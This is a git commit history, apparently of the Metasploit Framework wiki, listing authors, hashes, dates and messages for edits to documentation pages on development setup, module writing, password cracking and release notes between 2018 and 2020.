h00die a8f62c7b94 bold the fact the file must be executable 2020-10-17 20:57:01 -04:00
h00die 0278976121 add md5u 2020-10-10 11:55:23 -04:00
Grant Willcox 6e51ba2289 Add initial copy of information about how to use Gemfile.local.example as a template to them test Gem file updates with minimal setup 2020-09-23 17:19:02 -05:00
wvu-r7 8afcb0f199 Updated How to Send an HTTP Request Using HTTPClient (markdown) 2020-09-16 12:23:07 -05:00
Grant Willcox dbf7f8af8a Updated Setting Up a Metasploit Development Environment (markdown) 2020-09-16 11:48:45 -05:00
Pearce Barry 738d086759 Updated Downloads by Version (textile) 2020-08-19 13:30:37 -05:00
Pearce Barry 9e0373f9a3 Updated Downloads by Version (textile) 2020-08-19 13:27:30 -05:00
Grant Willcox 5bbe998361 Okay now this should have the update to link to the new template we created 2020-08-18 09:15:10 -05:00
Grant Willcox a94aad53f3 Updated Using ReflectiveDLL Injection (markdown) 2020-08-18 09:14:22 -05:00
h00die 94fa9ad405 Adding a New Hash 2020-08-14 16:14:29 -04:00
Spencer McIntyre 4dc8ba2680 Link to the new SMB module guidelines 2020-08-06 13:49:52 -04:00
Spencer McIntyre a28cb414b0 Make the title "modules" plural 2020-08-06 13:49:23 -04:00
cdelafuente-r7 9f3e5964f2 Created Guidelines for Writing Module with SMB (markdown) 2020-08-06 18:09:56 +02:00
Spencer McIntyre 1f3efe1ac0 Update the initial announcement link 2020-08-06 11:56:33 -04:00
Spencer McIntyre fd08f83345 Created Metasploit 6.0 Development Notes (markdown) 2020-08-06 11:54:24 -04:00
Brent Cook 8037a88eba Updated Nightly Installers (markdown) 2020-08-05 21:00:25 -05:00
Spencer McIntyre 32d3ca6f81 Destroyed Metasploit 6.0 Release Notes (markdown) 2020-08-03 19:10:42 -04:00
Spencer McIntyre adcaae914e Updated Metasploit 6.0 Release Notes (markdown) 2020-08-03 17:47:09 -04:00
Spencer McIntyre 5e91ee6115 Created Metasploit 6.0 Release Notes (markdown) 2020-08-03 16:45:43 -04:00
Spencer McIntyre d407afd782 Destroyed How to use exim_gethostbyname_bof.rb (Exim GHOST Buffer Overflow) (markdown) 2020-08-03 15:53:42 -04:00
Spencer McIntyre 31958356e0 Remove EXIM link 2020-08-03 15:53:25 -04:00
Grant Willcox 50078effaa Woops looks like missed one URL when doing our edits to update links to point to the rex-exploitation repo. Lets fix that 2020-07-31 17:23:25 -05:00
h00die 7a79343b26 fixes to dynamic_82 2020-07-21 18:33:30 -04:00
h00die 60cb83c273 add dynamic_82 2020-07-20 17:58:44 -04:00
Grant Willcox 6ce16febee Fix up a few capitalization errors here and there 2020-07-15 10:38:48 -05:00
Brent Cook f9302573fd change 'OS X' to 'macOS' since it hasn't been called OS X for half a decade, expand instructions. 2020-07-03 08:12:35 -05:00
adfoster-r7 ec2b5a66f3 Add initial proposal for URL support 2020-06-19 11:37:11 +01:00
Grant Willcox 0ba8b69d92 Update Block API Hash link 2020-06-15 14:59:15 -05:00
Grant Willcox f231cbd4b1 Update outdated link to point to old user's guide to better explain how payloads work, since it was already well documented there. 2020-06-15 14:28:08 -05:00
Grant Willcox f04d16ed03 Update Kali links since now they don't use www.kali.org but rather just kali.org 2020-06-15 14:17:14 -05:00
Grant Willcox ebf1cbec57 Make update to correct the file mode number and explain it a bit more. 2020-06-15 13:44:30 -05:00
Grant Willcox 961b98e0fb Updated Msftidy (markdown) 2020-06-15 13:42:10 -05:00
Grant Willcox dde48ded08 Update Stack Buffer Overflow vs Stack Exhaustion link and associated text so that the link is updated and the explanation is clearer 2020-06-15 13:31:23 -05:00
Grant Willcox c7f92859d5 Remove outdated link, update steps to reach the installation instructions given new download steps that must be done. 2020-06-15 13:26:45 -05:00
Grant Willcox 84f9635f79 Fix a few links here, though tbh this entire section needs a relooking over given how many broken links we have. 2020-06-15 13:21:48 -05:00
Grant Willcox 0ec60da5de Add missing https:// entries in front of some links, otherwise they will be treated as subdirectories within the Wiki rather than normal HTTP links. Also remove some slang in favor easier to comprehend wording. 2020-06-15 13:14:19 -05:00
Grant Willcox 68a6df62bf Update msftidy.rb link since we moved the tool one level deeper under the dev/ directory of tools/ 2020-06-15 13:09:47 -05:00
Grant Willcox f15fd0f47c Replacing MSDN blog link with an archive since as per usual MSDN likes to purge some of its old links and this one seems to have been deleted. 2020-06-15 13:04:57 -05:00
Grant Willcox 6762c7788a Update one of the links so it is more apparent. Saying YOU without context doesn't really help anyone. Also more clarity fixes in some places. 2020-06-15 13:01:28 -05:00
Grant Willcox 8e2074b598 Update broken link to Kali's Starting Metasploit Framework in Kali wiki entry 2020-06-15 12:21:34 -05:00
Grant Willcox e72014e12a Update broken to link to OJ's Meterpreter Internals video as the Vimeo link is dead 2020-06-15 12:18:27 -05:00
Grant Willcox 76b35b8ab6 Update the link on how to ZIP files with the link to "How to zip files with Msf::Util::EXE.to_zip" instead. 2020-06-15 10:27:43 -05:00
Grant Willcox 61ca034850 Destroyed How to zip files with Rex Zip Archive (markdown) 2020-06-15 10:22:18 -05:00
Grant Willcox 8ea2d5ddef Temporarily reinstate the Rex Zip Archive page 2020-06-15 10:19:55 -05:00
Grant Willcox 15565137e5 Removing Git Gotchas from homepage as that page was old and wasn't really on Git Gotcha's after all 2020-06-15 09:56:45 -05:00
Caitlin Condon 4e6db46287 change security email to proper one 2020-06-15 09:53:51 -05:00
Grant Willcox 7b77514fdd Destroyed Git Gotchas (markdown) 2020-06-15 09:52:37 -05:00
Grant Willcox bcf7305a22 Reininstate Git Gotcha's with temporary content until I can fully restore it 2020-06-15 09:47:47 -05:00
Grant Willcox 214f107cef Sorry last change should have been named updating How to use exim_gethostbyname_bof.rb (Exim GHOST Buffer Overflow) 2020-06-15 09:33:32 -05:00
Grant Willcox 208ddaff37 Reinstating this page as it is linked from our home page and it looks bad if we have broken links - sorry @h00die 2020-06-15 09:26:47 -05:00
Caitlin Condon adda7f6701 clarity edits 2020-06-13 12:59:29 -05:00
Caitlin Condon a407f7d01d Fix typos, more clarity edits. 2020-06-12 19:32:45 -05:00
Caitlin Condon 9f935cf752 ed for clarity 2020-06-12 19:13:08 -05:00
Caitlin Condon 855d6aabdc Rewrite of how to report Metasploit Framework bugs 2020-06-12 18:43:44 -05:00
tperry-r7 26e3c9356e Fixed two broken links 2020-06-12 14:57:37 -05:00
Brent Cook f2b4dbebbe Revert "remove unlinked Using-Metasploit page"
This reverts commit cd5ce7edc1.
2020-06-12 14:52:28 -05:00
Brent Cook 1e85b57781 Revert "delete obsolete 'Reporting-a-Bug'"
This reverts commit cec9f778d8.
2020-06-12 14:51:27 -05:00
tperry-r7 2b9fab6dc7 Changed steps to headings, edited for brevity, fixed spelling and grammar 2020-06-11 13:17:49 -05:00
tperry-r7 9ec5a38557 added toc, spelling fixes 2020-06-11 11:46:42 -05:00
tperry-r7 4dc438c972 changed headings to level 2, added toc, changed to list 2020-06-11 11:19:40 -05:00
tperry-r7 b016ab2b48 Changed to title case,fixed some grammar, added a toc 2020-06-10 14:32:51 -05:00
tperry-r7 f450ba4d7a fixed spelling, added a toc, linked missing pages, updated list to use bold formatting 2020-06-10 12:08:16 -05:00
tperry-r7 f8db1786fb Minor grammar fixes 2020-06-10 11:47:20 -05:00
tperry-r7 29b7247e32 Updated note to have formatting, changed name to title case, added a toc 2020-06-10 11:44:52 -05:00
tperry-r7 f6c7989937 removed with 2020-06-10 11:42:26 -05:00
tperry-r7 cf265c5224 Changed to title case,fixed some grammar, added a toc 2020-06-10 11:36:12 -05:00
tperry-r7 e02cc8384e Added a toc, changed title to title case, fixed spelling 2020-06-10 11:32:49 -05:00
tperry-r7 2b186a7ff3 no huge changes, grammar and spelling fixes, easier to read headings and added a toc. 2020-06-10 11:28:13 -05:00
h00die 4a45337911 add bourne linemax minimum 2020-06-09 17:03:43 -04:00
tperry-r7 4be173dadc Changed to just module documentation because the article also includes steps on adding to the documentation. Not just the command to generate it. 2020-06-04 12:18:35 -05:00
OJ Reeves fd81791de0 Updated to remove dead images and include references to the configuration block. 2020-05-29 10:31:58 +10:00
h00die a72055812a Destroyed How to use exim_gethostbyname_bof.rb (Exim GHOST Buffer Overflow) (markdown) 2020-05-28 07:26:22 -04:00
Brent Cook 402aec38d9 Removed old versions that can no longer work. 2020-05-26 10:02:33 -05:00
h00die ced2364219 add linemax minimums to printf and echo 2020-05-19 15:14:43 -04:00
Brent Cook 0734297dac Updated How to deprecate a Metasploit module (markdown) 2020-05-11 09:26:09 -05:00
Brent Cook 859f6dfb9e update web gateway link 2020-05-07 12:49:22 -05:00
Brent Cook cd5ce7edc1 remove unlinked Using-Metasploit page 2020-05-07 12:39:35 -05:00
Brent Cook afe34b9abc update Kali historical link 2020-05-07 12:39:22 -05:00
Brent Cook baf76961a3 fix historical link 2020-05-07 12:39:10 -05:00
Brent Cook 19243eab13 logging constants moved to logging.rb 2020-05-07 12:22:56 -05:00
Brent Cook cec9f778d8 delete obsolete 'Reporting-a-Bug' 2020-05-07 10:05:59 -05:00
Brent Cook d74aea89aa update most dev.metasploit.com references 2020-05-07 10:03:38 -05:00
Brent Cook c9874343fc remove obsolete reference 2020-05-07 09:56:22 -05:00
Brent Cook 3d30b3e65b update link references 2020-05-07 09:54:34 -05:00
Brent Cook aeae0e09f2 fix broken links 2020-05-07 09:47:29 -05:00
Spencer McIntyre 717ec654ec Add further reading 2020-05-06 19:40:10 -04:00
Spencer McIntyre 42849d71cd Add the .NET Deserialization wiki page 2020-05-06 19:33:17 -04:00
adamgalway-r7 1228443d06 Nice sign-off 2020-05-01 12:07:51 +01:00
adamgalway-r7 2a66094517 Added link to bcook's web service wiki article and pointed to a few nice start up guides 2020-05-01 12:05:14 +01:00
adamgalway-r7 d0c5594b00 Created msfdb: Database Features & How to Set up a Database for Metasploit (markdown) 2020-04-30 17:50:25 +01:00
Tod Beardsley 66e07e5a34 Warn against altering this table. 2020-04-26 11:31:44 -05:00
Tod Beardsley 1159c1bc5f Get rid of the conflicting comment about never ever storing keys at keybase. 2020-04-26 11:00:27 -05:00
todb-r7 962a947ec0 Now, fix the anchor tags I just broke. 2020-04-26 10:34:54 -05:00
todb-r7 ad65f121ca Update anchor tags in the msf-dev index 2020-04-26 10:32:35 -05:00
Tod Beardsley afe8663843 Get rid of the numbered list for bundler 2020-04-26 09:06:42 -05:00
Tod Beardsley 7e29335d1d More strenuously ask for docs updates. 2020-04-26 09:05:42 -05:00
Tod Beardsley dcf179a867 Add a 'cd .' to reload the gemspec so gems will land in the right place. 2020-04-26 08:55:43 -05:00
Tod Beardsley 2997369049 Warn about rebooting / relogging with RVM. 2020-04-26 08:44:43 -05:00
Grant Willcox 31b22d170f Update the ZDI references section once more to be a bit clearer on the expected format, and fixed some misspellings. 2020-04-23 10:45:29 -05:00
wvu-r7 531bc8d944 Updated Msftidy (markdown) 2020-04-23 00:51:53 -05:00
wvu-r7 207c55e1b0 Updated Msftidy (markdown) 2020-04-22 17:37:16 -05:00
h00die 0d1e267a78 Updated Hashes and Password Cracking (markdown) 2020-04-17 12:12:17 -04:00
h00die 3c396f05cc add hmac-md5 2020-04-17 12:04:53 -04:00
Caitlin Condon 50ec55c8e5 Updated dead links; evidently we didn't update the doc when the command stagers moved out of metasploit-framework and over to the rex-exploitation repo. Fail. 2020-04-10 16:25:29 -05:00
Grant Willcox 8c9d26ffcc .gitconfig is a file so label it as such 2020-04-10 10:53:49 -05:00
Grant Willcox 30d1f70017 Mark .git/config as code in text to standardize layout 2020-04-09 22:53:47 -05:00
Grant Willcox e6464cf9c8 Note that one of the examples leaves you in a detached HEAD state 2020-04-09 22:38:30 -05:00
Grant Willcox a65e53e856 Fix wording as the master branch is specific to Metasploit repository not Rapid7 2020-04-09 20:33:04 -05:00
Grant Willcox 40be41bf55 Update to merge flags explanation and code format fixes 2020-04-09 20:30:04 -05:00
Grant Willcox e451a79f0e Update the gpg key instructions to give more accurate and complete instructions and expected output. 2020-04-09 18:59:46 -05:00
Caitlin Condon cac4e7b1f1 Updated Committer Keys (markdown) 2020-04-08 08:58:49 -05:00
Spencer McIntyre 7c671140ba Update the class name 2020-03-06 10:48:27 -05:00
wvu-r7 cb07007a57 Updated How to use PhpEXE to exploit an arbitrary file upload bug (markdown) 2020-03-06 09:44:21 -06:00
tperry-r7 121ad24103 fixed msf formatting typo 2020-03-03 12:20:55 +00:00
Pearce Barry 9a59e6d893 Updated Downloads by Version (textile) 2020-02-20 15:16:17 -06:00
Pearce Barry 449384ed1f Updated Downloads by Version (textile) 2020-02-20 15:15:22 -06:00
adfoster-r7 a6f8002e30 Updated Bundled Modules Proposal (markdown) 2020-02-09 00:38:05 +00:00
Pearce Barry 79c1ddda9b Updated mentors for 2020. 2020-02-03 15:51:19 -06:00
Spencer McIntyre 27837db136 Use H3 instead of H2 for the new idea 2020-01-31 13:32:29 -05:00
Spencer McIntyre 349723f18d Propose the "conditionally exposed options" project 2020-01-31 13:31:52 -05:00
adfoster-r7 39703d0bc3 Require release notes as part of the landing a PR process 2020-01-31 15:35:02 +00:00
adamgalway-r7 6339080a25 Updated Code Of Conduct.md (markdown) 2020-01-31 15:02:42 +00:00
adamgalway-r7 d08d224a8d Update title 2020-01-31 14:59:55 +00:00
adamgalway-r7 1df6224be7 Adding code of conduct to wiki 2020-01-31 14:59:13 +00:00
Jeffrey Martin 8bc8f26c2f typo 2020-01-23 17:26:41 -06:00
Jeffrey Martin 596f25adec add initial GSoC 2020 updates 2020-01-23 17:25:21 -06:00
Pearce Barry d09bd96402 Forgot "archive"... 2020-01-23 14:02:49 -06:00
Pearce Barry e2f1e8d2e6 Bump with new 4.17.0 release... 2020-01-23 14:00:53 -06:00
Chris Doughty 96e1883088 Adding Installer 4.16.2 2020-01-16 13:31:33 -06:00
h00die 17425f2bf1 Updated Hashes and Password Cracking (markdown) 2020-01-16 14:17:15 -05:00
h00die bc377d86a3 add cracker modes andhashcat optimized kernel 2020-01-04 13:53:13 -05:00
h00die ceef01d356 update some links and such 2020-01-04 13:19:29 -05:00
h00die 0093f7a7ee Updated Hashes and Password Cracking (markdown) 2019-12-21 07:43:32 -05:00
tperry-r7 9804ee779a Removed requisite reading. 2019-12-19 10:55:10 -06:00
tperry-r7 2dee1afdcb changed to h1 2019-12-19 10:54:18 -06:00
tperry-r7 14ffaf5cd6 changed all h1 and h2. removed more to come. 2019-12-19 10:53:19 -06:00
tperry-r7 2cb8eb6c69 added bold to definitions, add periods to definition sentences, add code comments and fixed a few more typos. 2019-12-19 10:50:51 -06:00
tperry-r7 de9b4ef606 changed to h1 and h1 headings, fixed spelling errors, changed headings to correct case 2019-12-19 10:39:15 -06:00
tperry-r7 ce57e85b58 removed link to contributing- seemed out placed and mentioned again just below. changed all h1 tags. Removed the line starting with "This search" it was crossed out and the link was broken. 2019-12-19 10:34:03 -06:00
tperry-r7 82b12ffa43 changed to h1 section headings 2019-12-19 10:26:33 -06:00
tperry-r7 b78b90fad5 section headings are h1 tags 2019-12-19 10:25:08 -06:00
tperry-r7 20926378bd section headings are h1 tags 2019-12-19 10:24:27 -06:00
tperry-r7 234c2926ec Changed all to h2 headings 2019-12-19 10:21:35 -06:00
tperry-r7 4c2ee6b0dc Changed to imgur for release notes image to remove photo bucket tag, added heading to organize release note types, changed exploit to module so it matches gh tag, changed defect to fix so it matches the gh tag. Moved headings to h2 and h3. 2019-12-19 10:16:21 -06:00
acammack-r7 de6e1af36d Updated Meterpreter Configuration (markdown) 2019-12-19 09:31:06 -06:00
h00die 4ca3e69e0a added link to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/example.rb 2019-11-29 06:30:45 -05:00
Caitlin Condon 35bec6e5af kill typo 2019-11-27 13:31:17 -06:00
Caitlin Condon b857d08e71 Update contact info 2019-11-18 10:03:38 -06:00
Pearce Barry 995dc99924 Updated Downloads by Version (textile) 2019-11-13 16:06:06 -06:00
Pearce Barry 05adff3608 Updated due to point release of 4.16.1. 2019-11-13 16:05:28 -06:00
wvu-r7 947999f982 Improve wording 2019-11-10 12:14:22 -06:00
h00die a91aae7b55 update error messages 2019-10-24 21:07:31 -04:00
Caitlin Condon 05057890f6 Updated Committer Keys (markdown) 2019-10-24 10:54:53 -05:00
Caitlin Condon 7de3c757c9 committer list updates 2019-10-24 10:54:08 -05:00
Brent Cook c46123cdd3 Updated MSF6 Feature Proposals (markdown) 2019-10-16 16:52:00 +01:00
h00die 27e11e4fcc link to markdown template 2019-10-07 18:57:24 -04:00
acammack-r7 6946052fe9 Community is no longer being distributed and the release cadence has changed. 2019-09-13 11:19:20 -05:00
Brent Cook df4fab1d5f Updated Nightly Installers (markdown) 2019-09-11 12:05:50 -05:00
Brent Cook 95dfcdd6d3 Updated MSF6 Feature Proposals (markdown) 2019-09-03 02:13:40 -05:00
Caitlin Condon 9686f927a9 Updated Home (markdown) 2019-08-27 09:17:59 -05:00
Brent Cook 5cb69f0eed Updated Committer Keys (markdown) 2019-08-23 03:27:34 -05:00
Brent Cook 68bc83e21e Updated Nightly Installers (markdown) 2019-08-02 11:29:59 -05:00
Pearce Barry a7bdd3f38a Updated Downloads by Version (textile) 2019-07-24 14:44:04 -05:00
wvu-r7 c214188650 Updated Setting Up a Metasploit Development Environment (markdown) 2019-07-16 16:19:32 -05:00
wvu-r7 4e20cbbc4e Updated How to deprecate a Metasploit module (markdown) 2019-06-27 22:34:33 -05:00
Chris Doughty 874fd5434a Fix typos in paths 2019-06-27 14:41:51 -05:00
Sonny Gonzalez f126da9109 fix screwup 2019-06-27 12:12:28 -05:00
Sonny Gonzalez f3bc176214 fix typo 2019-06-27 12:02:17 -05:00
Sonny Gonzalez 9cb6023ca4 Add 4.15.1 and update 4.15.0 links 2019-06-27 12:00:26 -05:00
wvu-r7 b8271be000 Updated Creating Metasploit Framework LoginScanners (markdown) 2019-06-26 01:34:25 -05:00
wvu-r7 525b6b11cc Updated Writing External Python Modules (markdown) 2019-06-26 01:33:20 -05:00
wvu-r7 600a84195b Updated Writing External Python Modules (markdown) 2019-06-25 13:35:59 -05:00
wvu-r7 7404dcc91b Updated Writing External Python Modules (markdown) 2019-06-25 13:35:28 -05:00
n̸̺̳̮̖͚̺̺͍̪̰͎̰͇̯̙̋ͣͣ̆̇ͥ̕n̷̑͐̑ͩ̾͗ͣ͐̏҉̣̞̖͖͕̗̞̳̯͚̖n̶̵̫̣͓͈͓̥̣̬̠̗̤͔͖̘̫̪̱͇̤̏ͯ̿ͫͥ͐̍͂͛͊̓͜͢n̨̡̙̼̗̳̿̂ͤ̑͆ͧ́͂̈n̷̸̛͙̘̙̪͔͕͖̻̹͇̮̰̖̣͓̖̫ͪͥ̓̑͒͟͠ņͤͤͯ̌̒̽́̎ͦ̃̈͆̿͒̊ͣ͏̡͎̪̗̻̱̭̲̤͈̞̦͇͍̤̪̥̳̙͘ͅn̨͇̦̭̞̹̗̞̖̪̤̗ͩ́̋͛͂̂̿ͭͭ̈͢ʌ̸̵͉̱͍̤͍̫̰̘͚̲̝̩̤̙͗̑ͥ̃̈́͌̔̿̉͒ͦ̿̈̋́̚̚̕͢ͅʍ̸̭̰̬̖͚͓̠̮͙͓̝̥̞̥͉̏̈ͩͥͣͣ̆ 62b24fe9ed Fix typo 2019-06-25 13:11:19 -05:00
Brent Cook 94d22c366b Updated MSF6 Feature Proposals (markdown) 2019-06-10 17:35:28 -05:00
Brent Cook a4784f5dc3 Updated MSF6 Feature Proposals (markdown) 2019-06-06 15:45:06 -05:00
Brent Cook 7cb06b520b Updated MSF6 Feature Proposals (markdown) 2019-06-06 15:42:33 -05:00
Brent Cook 9211ff1a50 Updated MSF6 Feature Proposals (markdown) 2019-06-06 15:41:37 -05:00
Brent Cook dd62c9ff13 Updated MSF6 Feature Proposals (markdown) 2019-06-06 15:41:18 -05:00
Brent Cook 4c7be7422d Updated MSF6 Feature Proposals (markdown) 2019-06-06 12:04:52 -05:00
Brent Cook 0123dbcdd7 Updated MSF6 Feature Proposals (markdown) 2019-06-06 12:03:54 -05:00
Brent Cook 7418d9a331 Updated MSF6 Feature Proposals (markdown) 2019-06-06 12:03:04 -05:00
Brent Cook 13622201a5 Updated MSF6 Feature Proposals (markdown) 2019-06-06 12:01:46 -05:00
Brent Cook 92b1db134d Updated MSF6 Feature Proposals (markdown) 2019-06-06 12:00:46 -05:00
Brent Cook 014fd504c6 Updated MSF6 Feature Proposals (markdown) 2019-06-06 11:54:47 -05:00
Caitlin Condon eb50235461 Updated MSF6 Feature Proposals (markdown) 2019-06-02 10:43:02 -05:00
Brent Cook 57d4671e88 Updated MSF6 Feature Proposals (markdown) 2019-06-02 10:42:20 -05:00
Brent Cook 6126eecca6 Updated MSF6 Feature Proposals (markdown) 2019-06-02 10:34:39 -05:00
Brent Cook 4273d05166 Updated MSF6 Feature Proposals (markdown) 2019-06-02 10:26:33 -05:00
Brent Cook 97c647e5c5 Updated MSF6 Feature Proposals (markdown) 2019-06-02 10:17:45 -05:00
Brent Cook 6acfa99437 Created MSF6 Feature Proposals (markdown) 2019-06-02 10:11:51 -05:00
Brent Cook 6a5643a189 Created Bundled Modules Proposal (markdown) 2019-06-02 09:36:53 -05:00
Brent Cook 45b68bafb2 Updated Writing Module Documentation (markdown) 2019-05-24 16:29:08 -05:00
Aaron Soto b6a3d02b84 Created Handling module failures with fail_with (markdown) 2019-05-06 13:04:29 -05:00
Sonny Gonzalez 2288928398 Bump Pro point release to 4.15.0 2019-04-18 11:04:41 -05:00
Aaron Soto 50d94ab2dd Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2019-04-03 15:43:48 -05:00
Caitlin Condon b064a2830d Destroying the rogue Zalgo 2019-04-03 15:41:56 -05:00
n̸̺̳̮̖͚̺̺͍̪̰͎̰͇̯̙̋ͣͣ̆̇ͥ̕n̷̑͐̑ͩ̾͗ͣ͐̏҉̣̞̖͖͕̗̞̳̯͚̖n̶̵̫̣͓͈͓̥̣̬̠̗̤͔͖̘̫̪̱͇̤̏ͯ̿ͫͥ͐̍͂͛͊̓͜͢n̨̡̙̼̗̳̿̂ͤ̑͆ͧ́͂̈n̷̸̛͙̘̙̪͔͕͖̻̹͇̮̰̖̣͓̖̫ͪͥ̓̑͒͟͠ņͤͤͯ̌̒̽́̎ͦ̃̈͆̿͒̊ͣ͏̡͎̪̗̻̱̭̲̤͈̞̦͇͍̤̪̥̳̙͘ͅn̨͇̦̭̞̹̗̞̖̪̤̗ͩ́̋͛͂̂̿ͭͭ̈͢ʌ̸̵͉̱͍̤͍̫̰̘͚̲̝̩̤̙͗̑ͥ̃̈́͌̔̿̉͒ͦ̿̈̋́̚̚̕͢ͅʍ̸̭̰̬̖͚͓̠̮͙͓̝̥̞̥͉̏̈ͩͥͣͣ̆ aee938fa66 Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2019-04-03 15:37:15 -05:00
h00die 6d881dd3ff Updated Hashes and Password Cracking (markdown) 2019-04-02 14:52:58 -04:00
h00die 45b69ed2d2 Updated Hashes and Password Cracking (markdown) 2019-04-02 14:49:37 -04:00
h00die 1d410c96b7 Updated Hashes and Password Cracking (markdown) 2019-04-02 14:46:40 -04:00
h00die 3f0529b222 Updated Hashes and Password Cracking (markdown) 2019-04-02 14:45:48 -04:00
h00die 17b5e2d7c1 Updated Hashes and Password Cracking (markdown) 2019-04-02 14:44:53 -04:00
h00die 4a572a4e3f Updated Hashes and Password Cracking (markdown) 2019-04-02 14:31:50 -04:00
h00die 106017c3ee Updated Hashes and Password Cracking (markdown) 2019-04-02 13:25:47 -04:00
h00die e494dd3fb6 Updated Hashes and Password Cracking (markdown) 2019-04-02 13:20:06 -04:00
h00die cafcc48526 Add initial Hashes and Password Cracking page 2019-04-02 10:54:58 -04:00
h00die 8d7189a69e updated oracle from 12_1 to 12_2, and gem from 2.1.8 to 2.2.7 2019-03-26 20:47:36 -04:00
Caitlin Condon d68d835e4f Destroyed Setting Up a Metasploit Development Environment Ubuntu 14.04 (markdown) 2019-03-05 11:20:27 -06:00
Caitlin Condon f3a58b740c Updated Home (markdown) 2019-03-05 11:18:18 -06:00
Caitlin Condon 2e4af03d04 Destroyed Why Ruby (markdown) 2019-03-05 11:17:52 -06:00
Brent Cook 4e8485054b Updated Work needed to allow msfdb to use postgresql common (markdown) 2019-03-01 17:55:20 -06:00
Matthew Kienow 459fd1163a Initial page 2019-03-01 18:48:43 -05:00
Caitlin Condon aa80721cf1 Created Metasploit Framework Wish List (markdown) 2019-03-01 11:07:17 -06:00
Caitlin Condon cf31d1f289 Updated Using Git (markdown) 2019-02-24 16:47:44 -06:00
Brent Cook 134bb9a484 change default port to 5443 2019-02-22 12:40:10 -06:00
Sonny Gonzalez 2b378b5539 typo fixed 2019-02-02 09:10:41 -06:00
Caitlin Condon 2ef1961b4a Updated GSoC 2018 Student Proposal (markdown) 2019-01-16 10:09:19 -06:00
Caitlin Condon 2961feda82 Created GSoC 2019 Project Ideas (markdown) 2019-01-15 17:13:29 -06:00
Chris Doughty 139dd45680 Adding the 4.14.3 release 2019-01-10 16:41:05 -06:00
Caitlin Condon 0888eae279 Updated How to add and update gems in metasploit framework (markdown) 2019-01-10 13:28:15 -06:00
Caitlin Condon b4fe942fbc Destroyed Decommissioning Redmine (markdown) 2019-01-10 13:25:05 -06:00
Caitlin Condon bde5d92f77 Updated Contact (markdown) 2019-01-10 13:22:02 -06:00
Brent Cook 396fa88ffd Updated Metasploit Hackathons (markdown) 2019-01-10 13:15:24 -06:00
Caitlin Condon 87d457a75e Destroyed Weekly Wrapup (markdown) 2019-01-10 13:14:40 -06:00
Caitlin Condon d4c91f7131 Updated Evading Anti Virus (markdown) 2019-01-10 13:13:57 -06:00
Caitlin Condon b5e01a4716 Destroyed Git Gotchas (markdown) 2019-01-10 13:13:10 -06:00
Caitlin Condon f9a0c1ac1e Destroyed Indentation Standards (markdown) 2019-01-10 13:11:36 -06:00
Caitlin Condon 5d6dc0d2d5 Destroyed Metasploit development environment (markdown) 2019-01-10 13:08:03 -06:00
Caitlin Condon b2228dc3ca Destroyed How to zip files with Rex Zip Archive (markdown) 2019-01-10 13:07:00 -06:00
Caitlin Condon 691df59883 Destroyed Resuscitating Dead Pull Requests (markdown) 2019-01-10 13:06:27 -06:00
Gayle Davidson 7624fb5b4e Updated Metasploit 5.0 Release Notes (markdown) 2019-01-10 12:12:14 -06:00
Gayle Davidson 36e3649815 Updated Home (markdown) 2019-01-10 11:49:01 -06:00
Gayle Davidson b5d82a9154 Created Metasploit 5.0 Release Notes (markdown) 2019-01-10 11:45:13 -06:00
Aaron Soto 1b50a8fccc Fixed broken hyperlink 2019-01-09 12:02:46 -06:00
Aaron Soto f334370f8a Updated Setting Up a Metasploit Development Environment (markdown) 2019-01-09 18:01:20 +00:00
Caitlin Condon f9cbe15c7a Clean-up and copy edits 2019-01-08 13:47:05 -06:00
Caitlin Condon 278e2e307a Clean-up and structural refresh 2019-01-08 13:09:25 -06:00
Caitlin Condon 0d1e71667d Updated Using Metasploit (markdown) 2019-01-08 13:06:43 -06:00
Caitlin Condon c6fa498c94 Updated Using Metasploit (markdown) 2019-01-08 13:06:30 -06:00
Caitlin Condon b523f061d7 Updated Using Metasploit (markdown) 2019-01-08 13:01:22 -06:00
Caitlin Condon 379801a709 Updated Using Metasploit (markdown) 2019-01-08 12:54:48 -06:00
Caitlin Condon 259f11ff6c Updated Home (markdown) 2019-01-08 09:35:39 -06:00
Caitlin Condon 2e3be822df Title edit to disambiguate 2019-01-08 09:35:07 -06:00
Aaron Soto 95f3bffb21 Updated Setting Up a Metasploit Development Environment (markdown) 2018-12-28 16:41:04 -06:00
Aaron Soto 264d058dcc Updated Setting Up a Metasploit Development Environment (markdown) 2018-12-28 16:40:39 -06:00
Green-m c1849a1866 Add my key 2018-12-26 15:55:39 +08:00
Aaron Soto e341bea89e Expanded GPG key generation, added note about name and email requirements 2018-12-20 13:40:40 -06:00
Aaron Soto d2d8bcbc31 Clean up formatting and wording in the final section 2018-12-19 11:23:52 -06:00
Aaron Soto 6090d8a627 Fix markdown typo and hyperlink 2018-12-19 11:14:55 -06:00
Aaron Soto 087d597061 Final draft of documentation for new ysoserial support 2018-12-19 11:14:04 -06:00
Christopher Lee 28425dd8d6 Updated Writing External GoLang Modules (markdown) 2018-12-12 11:22:02 -05:00
Christopher Lee cdf6e3e223 Updated Writing External GoLang Modules (markdown) 2018-12-12 11:15:28 -05:00
Christopher Lee 5f66f13557 Updated Contributing GoLang Modules (markdown) 2018-12-12 11:01:23 -05:00
Christopher Lee b5e7faed73 Updated Contributing GoLang Modules (markdown) 2018-12-12 10:48:05 -05:00
Christopher Lee 0259e523ed Created Contributing GoLang Modules (markdown) 2018-12-12 10:47:27 -05:00
Brent Cook c13649d4ed Updated 2017 Roadmap Review (markdown) 2018-12-11 11:18:14 -06:00
Brent Cook 5208007b2b Updated 2018 Roadmap (markdown) 2018-12-11 11:13:22 -06:00
Caitlin Condon ba6924f75e Updated Home (markdown) 2018-12-11 09:33:39 -06:00
Caitlin Condon d77d556cad Editing titles so ? doesn't make Windows filesystems sad 2018-12-11 08:54:01 -06:00
Caitlin Condon 17fe9ea712 Editing titles so ? doesn't make Windows filesystems sad 2018-12-11 08:53:43 -06:00
Caitlin Condon f5c415c42b Editing titles so :: and ? don't make Windows filesystems sad 2018-12-11 08:52:38 -06:00
Caitlin Condon b977d4e283 Editing titles so :: doesn't make Windows filesystems sad 2018-12-11 08:50:57 -06:00
Caitlin Condon 06ec2d09d9 Editing titles so :: doesn't make Windows filesystems sad 2018-12-11 08:50:07 -06:00
Caitlin Condon 2d00c0e098 Editing titles so :: doesn't make Windows filesystems sad 2018-12-11 08:48:23 -06:00
Caitlin Condon 6b52291d3a Editing titles so :: doesn't make Windows filesystems sad 2018-12-11 08:47:37 -06:00
